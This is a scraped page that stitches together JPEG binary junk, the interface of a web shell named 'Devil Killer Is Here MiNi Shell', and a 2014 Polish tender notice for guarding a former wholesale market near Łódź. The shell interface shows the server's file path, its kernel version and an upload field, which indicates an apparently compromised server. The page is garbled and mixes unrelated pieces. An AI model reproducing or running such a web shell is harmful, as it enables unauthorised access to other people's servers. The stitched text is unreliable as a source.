JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/393628-N-2014.html

<p class="kh_header"><b>Łódź: Świadczenie  usługi  polegającej  na  dozorowaniu  i  ochronie  nieruchomości  i  terenów  stanowiących  dawny  Łódzki  Rolno-Spożywczy  Rynek  Hurtowy,  w  miejscowości  Widzew, ul. Szkolna  14,gm. Ksawerów,  powiat  pabianicki,  województwo  łódzkie</b><br>
<b>Numer ogłoszenia: 393628 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi , ul. Północna 27/29, 91-420 Łódź, woj. łódzkie, tel. 042 636 53 26, faks 042 632 9133.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie  usługi  polegającej  na  dozorowaniu  i  ochronie  nieruchomości  i  terenów  stanowiących  dawny  Łódzki  Rolno-Spożywczy  Rynek  Hurtowy,  w  miejscowości  Widzew, ul. Szkolna  14,gm. Ksawerów,  powiat  pabianicki,  województwo  łódzkie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie  usługi  polegającej  na  dozorowaniu  i  ochronie  nieruchomości  i  terenów  stanowiących  dawny  Łódzki  Rolno-Spożywczy  Rynek  Hurtowy, w miejscowości Widzew, przy ul. Szkolnej 14,  gm. Ksawerów,  powiat  pabianicki,  województwo  łódzkie.

Usługę  dozoru,  monitorowania  i  ochrony  stacjonarnej  należy  wykonywać  7 dni  w  tygodniu,  w  godzinach  określonych  poniżej,  w  okresie  od  dnia  31.12.2014 r.  od  godz. 18:00  do  dnia  31.12.2015r.  do  godz. 18:00,  w  formie  ochrony  stacjonarnej,  objazdów  i  obchodu  wyznaczonego  terenu  oraz  usytuowanych  tam  nieruchomości  w  taki  sposób,  aby  jeden  pracownik  zapewniał  ochronę  obiektu  w  wyznaczonym  czasie.  Pracownik  ochrony  stacjonarnej,  pełniący  wartę  w  godzinach  nocnych,  jest  dodatkowo  wspierany  przez  co  najmniej  jedną  Grupę  Patrolowo - Interwencyjną  (GPI).

Monitoring  elektroniczny  nieruchomości  należy  prowadzić  całodobowo,  wraz  z  zapewnieniem  dojazdu  Grupy  Patrolowo - Interwencyjnej  w  określonym  czasie,  ustalonym  w  części  III,  pkt. 4  Instrukcji  Dozoru  na  Terenie  Nieruchomości.

Dozór  pracownika  ochrony  przewiduje  się  wg  następującego  grafiku  dyżurów:

1)	31 grudzień 2014r. - dyżur  w  godz. 18:00 - 24:00							6 h

2)	styczeń 2015r. - sob., niedz., św.  (1, 3, 4, 6, 10, 11, 17, 18, 24, 25, 31) = 6h + 10 dni * 24h = 246 h
pon., pt. = 20 dni*12h = 240 h	w  godz. 0:00 - 6:00  i  18:00 - 24:00		Łącznie  246 + 240 = 486 h

3)	luty 2015r. - sob., niedz.  (1, 7, 8, 14, 15, 21, 22, 28) = 8 dni * 24h = 192 h	w  godz. 0:00 - 24:00
	pon., pt. = 20 dni*12h = 240 h	w  godz. 0:00 - 6:00  i  18:00 - 24:00		Łącznie  192 + 240 = 432 h

4)	marzec 2015r. - sob., niedz.  (1, 7, 8, 14, 15, 21, 22, 28, 29) = 9 dni * 24h = 216 h	w  godz. 0:00 - 24:00
	pon., pt. = 22 dni*12h = 264 h	w  godz. 0:00 - 6:00  i  18:00 - 24:00		Łącznie  216 + 264 = 480 h

5)	kwiecień 2015r. - sob., niedz. św.  (4, 5, 6, 11, 12, 18, 19, 25, 26) = 9 dni * 24h = 216 h
	w  godz. 0:00 - 24:00
	pon., pt. = 21 dni*11h = 231 h	w  godz. 0:00 - 6:00  i  19:00 - 24:00		Łącznie  216 + 231 = 447 h

6)	maj 2015r. - sob., niedz., św.  (1, 2, 3, 9, 10, 16, 17, 23, 24, 30, 31) = 11 dni * 24h = 264 h
	w  godz. 0:00 - 24:00
	pon., pt. = 20 dni*10h = 210 h	w  godz. 0:00 - 6:00  i  20:00 - 24:00		Łącznie  264 + 210 = 474 h

7)	czerwiec 2015r. - sob., niedz., św.  (4, 6, 7, 13, 14, 20, 21, 27, 28) = 9 dni * 24h = 216 h
	w  godz. 0:00 - 24:00
	pon., pt. = 21 dni*10h = 210 h	w  godz. 000 - 6:00  i  20:00 - 24:00		Łącznie  216 + 210 = 426 h

8)	lipiec 2015r. - sob., niedz.  (4, 5, 11, 12, 18, 19, 25, 26) = 8 dni * 24h = 192 h	  w  godz. 0:00 - 24:00
	pon., pt. = 23 dni*10h = 230 h	w  godz. 0:00 - 6:00  i  20:00 - 24:00		Łącznie  192 + 230 = 422 h

9)	sierpień 2015r. - sob., niedz., św.  (1, 2, 8, 9, 15, 16, 22, 23, 29, 30) = 10 dni * 24h = 240 h
	w  godz. 0:00 - 24:00
	pon., pt. = 21 dni*10h = 210 h	w  godz. 0:00 - 6:00  i  20:00 - 24:00		Łącznie  240 + 210 = 450 h

10)	wrzesień 2015r. - sob., niedz.  (5, 6, 12, 13, 19, 20, 26, 27) = 8 dni * 24h = 192 h	w  godz. 0:00 - 24:00
	pon., pt. = 22 dni*11h = 242 h	w  godz. 0:00 - 6:00  i  19:00 - 24:00		Łącznie  192 + 242 = 434 h

11)	październik 2015r. - sob., niedz.  (3, 4, 10, 11, 17, 18, 24, 25, 31) = 9 dni * 24h = 216 h	  w  godz. 0:00 - 24:00
	pon., pt. = 22 dni*12h = 264 h	w  godz. 0:00 - 6:00  i  18:00 - 24:00		Łącznie  216 + 264 = 480 h

12)	listopad 2015r. - sob., niedz., św.  (1, 7, 8, 11, 14, 15, 21, 22, 28, 29) = 10 dni * 24h = 240 h
	w  godz. 0:00 - 24:00
	pon., pt. = 20 dni*12h = 240 h	w  godz. 0:00 - 6:00  i  18:00 - 24:00		Łącznie  240 + 240 = 480 h

13)	grudzień 2015r. - sob., niedz., św.  (5, 6, 12, 13, 19, 20, 25, 26, 27) = 9 dni * 24h = 216 h
	w  godz. 0:00 - 24:00
	pon., pt. = 21 dni*12h = 252 h	w  godz. 0:00 - 6:00  i  18:00 - 24:00 (od  01.12. - 30.12.2015r.)
	dyżur  w  dniu  31.12.2015r.  6 h  w  godz. 0:00 - 6:00			Łącznie  216 + 252 + 6 = 474 h

Ogółem  5 491 h / rok,  tj. 365 dni


Od  godz. 18:00  w  dniu  31.12.2015r.  przewiduje  się  podjęcie  ochrony  przez  Firmę,  której  Zamawiający  powierzy  ochronę  nieruchomości  w  roku  2016,  po  zakończeniu  postępowania  przetargowego  w  trybie  ustawy  prawo  zamówień  publicznych  i  zawarciu  umowy.

Do  obowiązków  pracowników  służby  ochronnej  należy  zabezpieczenie  mienia  Zamawiającego,  znajdującego  się  na  terenie  nieruchomości  objętej  ochroną,  przed  kradzieżą,  włamaniem  i  uszkodzeniem  oraz  zapobieganie  pożarom,  zalaniom  pomieszczeń  itp.  wypadkom  losowym,  w  przypadku  możliwości  zaobserwowania  i  stwierdzenia  tych  zjawisk.

Dodatkowo,  w  okresie  zimowym,  pracownik  ochrony  jest  zobowiązany  do  usuwania  na  bieżąco  śniegu  i  błota  pośniegowego  zalegającego  w  polu  otwierania  się  skrzydeł  bramy  wjazdowej.
Powyższe  czynności  pracownik  dozoru  wykonuje  za  pomocą  sprzętu  dostarczonego  przez  firmę  ochroniarską.

Ochrona  obiektu,  na  zasadach  określonych  w  niniejszym  zamówieniu  rozpoczyna  się  według  terminów  określonych  powyżej,  chyba  że  z  uwagi  na  przeszkody  administracyjne  (np. wynikające  z  przepisów  dot. zawarcia  umowy,  uregulowanych  w  ustawie  Pzp)  zawarcie  umowy  z  Wykonawcą  nie  byłoby  możliwe  w  w/w  terminie.

Obiekt  podlegający  ochronie  jest  aktualnie  chroniony  przez  profesjonalną  firmę.
Przejęcie  odpowiedzialności  za  chroniony  obiekty  zostanie  dokonane  w  formie  protokołu  zdawczo-odbiorczego,  podpisanego  przez  upoważnionych  pracowników  firmy,  której  umowa  wygasa,  i  umocowanych  przedstawicieli  firmy,  której  Zamawiający  powierzy  obowiązki  ochronne.

Informacje  dodatkowe  dotyczące  wykonania  przedmiotu  zamówienia.

a)	realizacja  usługi  powinna  być  prowadzona  zgodnie  z  obowiązującymi  normami  i  przepisami  prawa,
b)	Wykonawca  zobowiązany  jest  realizować  przedmiot  niniejszej  umowy  z  należytą  starannością,  nie  dopuszczając  do  jakichkolwiek  zniszczeń  bądź  szkód  na  powierzonym  do  ochrony  mieniu  Zamawiającego,  przejmując  z  tego  tytułu  odpowiedzialność  finansową.

W  związku  z  charakterem  przedmiotowego  zamówienia,  Zamawiający  dopuszcza  możliwość  dokonania  oględzin  terenu  i  budynku  przez  Wykonawcę.
Koszty  dokonania  wizji  lokalnej  ponosi  Wykonawca.  Wizja  lokalna  odbywa  się  w  obecności  oddelegowanego  pracownika  Zamawiającego.

Wykonawca  zobowiązany  jest  realizować  przedmiot  zamówienia  zgodnie  z  zapisami  zawartymi  w  umowie,  instrukcją  dozoru  oraz  zgodnie  z  obowiązującymi  przepisami  prawa  tj. w  szczególności:

a)	Ustawy  z  dnia  29.01.2004r. -  prawo  zamówień  publicznych
(tekst  jednolity - Dz. U.  z  2013r.  poz.907  z  późn. zm.)
b)	Obowiązującymi  przepisami  BHP
c)	Ustawy  z  dnia  22.08.1997r. - o  ochronie  osób  i  mienia
(tekst  jednolity - Dz. U.  z  2013r.  poz. 628  z  późn. zm.)

Zamawiający  wyraża  zgodę  na  realizację  zadania  w  części  obejmującej  dojazdy  oraz  interwencje  Grupy  Patrolowo - Interwencyjnej,  zgodnie  z  ustaleniami  zawartymi  w  części  III,  pkt. 4  Instrukcji  Dozoru  na  Terenie  Nieruchomości,  przez  podwykonawców.


Wykonawca  zobowiązuje  się  do  zapewnienia  swoim  pracownikom,  wykonującym  zadania  ochronne  na  obiekcie  objętym  ochroną,  jednolitego  ubioru  oraz  identyfikatorów  osobistych  i  wyposażenia  niezbędnego  do  prawidłowego  wykonywania  przydzielonych  zadań  np. wyposażenie  w  czytniki  obchodowe,  pozwalające  kontrolowanie  dozoru  obiektu  oraz  pilota  antynapadowego,  umożliwiającego  w  szybkim  czasie  wezwanie  grupy  interwencyjnej.
Dodatkowo,  Wykonawcy  zostanie  przekazany  pilot  do  zdalnego  otwierania  i  zamykania  bramy  wjazdowej.

Zapewnienie  właściwej  organizacji  służby  ochronnej  należy  do  obowiązków  Wykonawcy.
Cel  pełnienia  ochrony,  zakres  obowiązków  pracowników  służby  ochronnej  oraz  zakres  i  częstotliwość  kontroli  ich  pracy  określono  w  Załączniku  Nr 1  do  Umowy,  tj. instrukcji  dozoru.
W  skład  nieruchomości  podlegającej  ochronie  wchodzą  budynki,  budowle  oraz  urządzenia  naziemne  (sieć  oświetlenia  terenu,  ogrodzenie)  i  podziemne  (sieć  instalacji  wodociągowej,  kanalizacyjnej,  deszczowej).

Nieruchomość  położona  jest  na  działkach  o  powierzchni  ok. 23 ha.  Część  dozorowana  nieruchomości  jest  ogrodzona.  Od  strony  ulicy  Szkolnej  zainstalowana  jest  automatycznie  sterowana  brama  wjazdowa  wraz  z  furtką  wejściową,  które  pozostają  zamknięte.
Najemcy,  posiadający  umowy  na  użytkowanie  powierzchni  oraz  lokali  na  terenie  ochranianej  nieruchomości,  są  wyposażeni  w  piloty  dalekiego  zasięgu,  umożliwiające  otwieranie  i  zamykanie  bramy  wjazdowej.
Przy  furtce  zamontowane  są  numeryczne  klawiatury  kodowe,  do  których  kody  przydzielono  osobom  uprawnionym.
Powierzchnie  komunikacyjne  wyłożone  są  asfaltobetonem  lub  kostką  brukową.
Od  strony  ulicy  Szkolnej  nieruchomość  oddzielona  jest  ekranem  akustycznym,  który  stanowi  wał  ziemny  usytuowany  wzdłuż  ulicy  Szkolnej.  Teren  jest  oświetlony.

Teren,  w  całości  stanowi  własność  Skarbu  Państwa.
Naniesienia  stanowią  wyszczególnione  poniżej  budynki  i  budowle.

1.	Budynek  administracyjny  [administracyjno - biurowy]
Usytuowany  w  sąsiedztwie  ulicy  Giełdowej,  we  wschodniej  części  nieruchomości.

2.	Hale  handlowe  A  i  B
Wybudowane  w  konstrukcji  stalowej,  jednokondygnacyjne,  niepodpiwniczone,  usytuowane  w  środkowej  części  nieruchomości.

3.	Hala  magazynowa  C  wraz  z  łącznikiem
Wybudowana  w  konstrukcji  stalowej,  jednokondygnacyjna,  niepodpiwniczona,  usytuowana  w  części  środkowej  nieruchomości,  w  kierunku  wschodnim.
Hala  sąsiaduje  bezpośrednio  z  Halą  magazynową  D.

4.	Hala  magazynowa  D
Wybudowana  w  konstrukcji  stalowej,  jednokondygnacyjna,  oraz  w  części  zachodniej  dwukondygnacyjna,  niepodpiwniczona.  Usytuowana  jest  w  części  środkowej  nieruchomości,  w  kierunku  wschodnim.  Sąsiaduje  bezpośrednio  z  łącznikiem  i  Halą  magazynową  C.

5.	Wiaty  handlowe  Nr 1  E  i  Nr 2  F
Konstrukcja  słupowa  posadowiona  na  stopach  żelbetowych,  usytuowane  są  w  środkowej  części  nieruchomości.

6.	Budynek  administracyjno - techniczny,  adaptowany  na  magazyn  wraz  z  kotłownią
Budynek  parterowy,  niepodpiwniczony,  wykonany  w  konstrukcji  tradycyjnej,  murowanej.  Usytuowany  jest  w  środkowej  części  nieruchomości,  na  przeciwko  Hali  C  z  łącznikiem  i  Hali  D.

7.	Stacja  TRAFO
Budynek  parterowy,  niepodpiwniczony,  murowany,  usytuowany  we  wschodniej  części  nieruchomości,  od  strony ulicy  Giełdowej.

8.	Zbiorniki  bezodpływowe
Dwa  zbiorniki  podziemne  o  poj. ok. 25 m3  każdy,  wykonane  z  tworzywa,  ze  studzienkami  włazowymi.  Usytuowane  są  w  sąsiedztwie  drugiej  bramy  wjazdowej,  w  zachodniej  części  nieruchomości.

9.	Na  terenie  nieruchomości  znajdują  się  podziemne  instalacje  sieci  kanalizacji  deszczowej  (wraz  z  separatorem),  kanalizacji  sanitarnej  (odprowadzonej  do  lokalnego  zbiornika  bezodpływowego),  sieci  wodociągowej,  ciepłowniczej  (doprowadzonej  do  budynków  Hali  A,  B,  C  i  D,  budynku  administracyjno - biurowego),  oświetlenie  terenu.

Woda  dostarczana  jest  do  nieruchomości  przez  Gminną  Jednostkę  Wod.-Kan.  w  Ksawerowie.
Ścieki  odprowadzane  są  do  lokalnego  szamba,  usytuowanego  w  sąsiedztwie  obecnie  nieużytkowanej  bramy  wjazdowej,  w  zachodniej  części  nieruchomości.
Powierzchnie  użytkowe  są  wynajmowane.
Umowy  najmu  zawarte  są  na  czas  określony,  z  możliwością  wypowiedzenia  każda.

Obok  głównej  drogi  wjazdowej  na  teren  nieruchomości  usytuowany  jest  kontener  stanowiący  zaplecze  dla  pracowników  Firmy  wykonującej  usługi  dozoru  i  ochrony  nieruchomości.
Do  kontenera  doprowadzona  jest  energia  elektryczna.

Teren,  na  którym  usytuowane  są  budynki  i  budowle  podlegające  ochronie,  jest  ogrodzony.
Oświetlenie terenu  jest  włączane  automatycznie,  przy  zastosowaniu  czujników  zmierzchowych.

Ogrodzenie  stanowi  siatka  na  słupkach  metalowych.

Jedna  z  bram,  usytuowana  w  sąsiedztwie  zbiorników  na  nieczystości  płynne - szamba,  jest  trwale  zamknięta,  obecnie  nieużytkowana.

Drogi  ewakuacyjne  z  terenu  nieruchomości  znajdują  się  w  dobrym  stanie  technicznym.

Obok  budynku  Hali D,  od  strony  północnej,  znajdują  się  stanowiska  magazynowania  butli  gazowych,  spawalniczych,  wykorzystywanych  przez  pracowników  firmy  wynajmującej  powierzchnie  w  w/w  hali.
Brak  materiałów  łatwopalnych  i  wybuchowych  składowanych  w  sąsiedztwie  innych  dróg  komunikacyjnych.  Dojazd  straży  pożarnej  oraz  komunikacja  na  terenie  nieruchomości,  w  części  ogrodzonej,  bez  zastrzeżeń.
Wykonawca  przygotowuje  szczegółową  instrukcję  dotyczącą  zasad  świadczenia  usługi  dozoru
i  ochrony  terenu  oraz  nieruchomości  stanowiącej  Łódzki  Rolno - Spożywczy  Rynek  Hurtowy  usytuowany  w  miejscowości  Widzew,  przy  ul. Szkolnej  nr 14,  którą  należy  przedłożyć  Zamawiającemu  do  zatwierdzenia  w  terminie  do  dnia  14.01.2015r.

W  instrukcji  należy  szczegółowo  opisać  sposób  realizacji  ochrony  nieruchomości,  podać  dane  dotyczące  rodzaju  zabezpieczeń  technicznych  oraz  określić  instrukcje  postępowania  w  przypadkach  szczególnych  (napad,  włamanie,  itp.),  instrukcję  współpracy  z  policją  i  innymi  służbami,  wykaz  osób  odpowiedzialnych  za  wykonywanie  ochrony,  wykaz  adresów  i  telefonów  pracowników  ochrony  wraz  z  dokumentami  potwierdzającymi  niekaralność,  sposób  wydawania  i  ewidencjonowania  kluczy.
2.	Klauzule społeczne
Zamawiający ustanawia dodatkowe wymagania związane z realizacją zamówienia w formie klauzuli społecznej. Na podstawie art. 29 ust. 4 ustawy Prawo zamówień publicznych Zamawiający wymaga, aby wśród osób uczestniczących w wykonywaniu zamówienia zatrudniona była jedna osoba bezrobotna na podstawie skierowania z powiatowego urzędu pracy, zgodnie z ustawą z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69, poz. 415 z późn. zm.) lub na podstawie właściwego dokumentu kierującego bezrobotnego do pracodawcy, wystawionego przez organ zajmujący się realizacją zadań z zakresu rynku pracy, określony w analogicznych przepisach państwa członkowskiego UE lub Europejskiego Obszaru Gospodarczego. Wyżej wskazana osoba powinna być zatrudniona w terminie nie dłuższym niż 14 dni od daty podpisania umowy, nieprzerwanie przez cały okres trwania umowy. Wykonawca, w przypadku uznania jego oferty za najkorzystniejszą, zobowiązany jest do zatrudnienia 1 osoby bezrobotnej zgodnie z wymaganiami wskazanymi w niniejszym punkcie specyfikacji - klauzula społeczna, oraz w terminie do 21 dni od daty podpisania umowy, przedłożenia Zamawiającemu zgłoszeń ofert pracy, odpisu skierowania osoby bezrobotnej przez powiatowy urząd pracy do pracodawcy oraz umowy o pracę. Zamawiający uprawniony będzie do kontroli spełnienia przez Wykonawcę wymagań dotyczących zatrudnienia w/w osoby. Na żądanie Zamawiającego, Wykonawca obowiązany będzie niezwłocznie udokumentować fakt zatrudnienia w/w osoby.
W przypadku nie zatrudnienia w sposób nieprzerwany przy realizacji zamówienia wymaganej przez Zamawiającego liczby osób bezrobotnych, Wykonawca zapłaci Zamawiającemu karę umowną, w wysokości iloczynu kwoty najniższego wynagrodzenia, wraz z należnymi składkami na ubezpieczenie społeczne, oraz liczby miesięcy w okresie realizacji zamówienia, za każdego nie zatrudnionego bezrobotnego, poniżej liczby wymaganej przez Zamawiającego, chyba że Wykonawca wykaże, że przedstawił zgłoszenie ofert pracy powiatowemu urzędowi pracy, albo odpowiedniemu organowi zajmującemu się realizacją zadań z zakresu rynku pracy w państwie, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, a niezatrudnienie osoby bezrobotnej nastąpiło z przyczyn nie leżących po jego stronie. Za przyczynę nie leżącą po stronie Wykonawcy będzie uznany w szczególności brak osób bezrobotnych zdolnych do wykonywania zamówienia na obszarze, w którym jest realizowane zamówienie i w okresie jego realizacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.40.00-2, 98.34.11.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości 1500,00 zł (tysiąc pięćset złotych i zero groszy)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca posiada uprawnienia niezbędne do wykonania przedmiotu zamówienia - Wykonawca zobowiązany jest załączyć do oferty: a) ważną i aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia wydaną przez właściwy organ. Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca posiada niezbędną wiedzę i doświadczenie, Wykonawca zobowiązany jest załączyć do oferty:- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane,
Celem wykazania spełniania powyższego warunku, wymagane jest wykazanie minimalnego doświadczenia w postaci wykonania:
a) co najmniej 2 usług tożsamych z przedmiotem zamówienia tj. związanych ze stacjonarnym dozorem oraz ochroną obiektów użyteczności publicznej lub wielofunkcyjnych (biurowo-handlowych) trwających nie krócej niż 12 miesięcy o wartości umowy co najmniej 70 000 zł brutto - wzór stanowi załącznik nr 5 do SIWZ
b) Na potwierdzenie, że usługi, na których zrealizowanie powołuje się  Wykonawca zostały wykonane lub są wykonywane należycie, Wykonawca zobowiązany jest dołączyć do wykazu poświadczenie (wystawione przez uprawniony podmiot lub osobę) lub oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia,
- W odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert;
- W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w ust. 4 li. a) zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej, a wymaganych przez Zamawiającego na potwierdzenie należytego wykonania usługi.Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
